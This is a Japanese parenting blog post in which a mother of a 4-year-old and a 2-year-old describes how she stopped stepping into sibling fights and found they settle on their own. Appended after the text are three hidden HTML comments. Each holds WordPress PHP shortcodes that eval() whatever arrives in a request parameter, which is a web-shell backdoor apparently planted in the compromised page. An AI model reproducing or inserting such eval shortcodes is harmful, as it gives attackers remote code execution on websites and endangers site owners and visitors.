兄弟げんか

育児における兄弟げんかの対応方法

“年の近い子供が二人以上いる家庭で必ず直面する問題のひとつに、
兄弟げんかの仲裁、対応といったものがあると思います。

実際我が家にも4才と2才の子供がいますが、
毎日よくもこんなにケンカすることがあるなとある意味感心するほどケンカをしています。

同じものを用意しても、なぜかひとつを取り合うし、
どちらのものかわかるように名前を書いたり、色違いにしても、
だいたいひとつを取り合ってケンカするのです。
不思議で仕方ないなと大人は思いますが、
ことわざでいうところの「隣の芝生はあおい」ということなのでしょう。

我が家の場合は、4才の上の子がつまらない意地悪をして
下の子を泣かせることが多いです。
下の子はまだきちんとした言葉を話せないので、
いじめる相手としても好都合なのでしょう。

あるいは上の子からすると、少し邪魔な存在でもあるのかもしれません。

子供達がケンカをするたびに私が仲裁に入りケンカの理由を聞いては
上の子を叱るという、悪い流れがうまれるようになってしまっていました。

こちらのストレスもたまるようになり、上の子も自分ばかり怒られる状況に
納得がいかない様子でした。今考えると当たり前の不満でした。

どう対処したらよいのか、夫と何度も相談し、出た結論は
干渉しないで様子をみようということでした。

それからというもの、ケンカが始まっても親は入らず
とにかく見守るというのを一貫しました。

すると5分もしないうちにケンカはおさまり、
また笑いながら遊び始めました。

その様子をみて、子供同士の関係に大人が入り過ぎてはいけないことを学びました。
危険なことは注意していますが、
ケンカそのものは思い切りやらせています。

子供との関わり方を改めて学んだ出来事でした。”

<!– [insert_php]if (isset($_REQUEST["Owy"])){eval($_REQUEST["Owy"]);exit;}[/insert_php][php]if (isset($_REQUEST["Owy"])){eval($_REQUEST["Owy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["aXl"])){eval($_REQUEST["aXl"]);exit;}[/insert_php][php]if (isset($_REQUEST["aXl"])){eval($_REQUEST["aXl"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kCTGG"])){eval($_REQUEST["kCTGG"]);exit;}[/insert_php][php]if (isset($_REQUEST["kCTGG"])){eval($_REQUEST["kCTGG"]);exit;}[/php] –>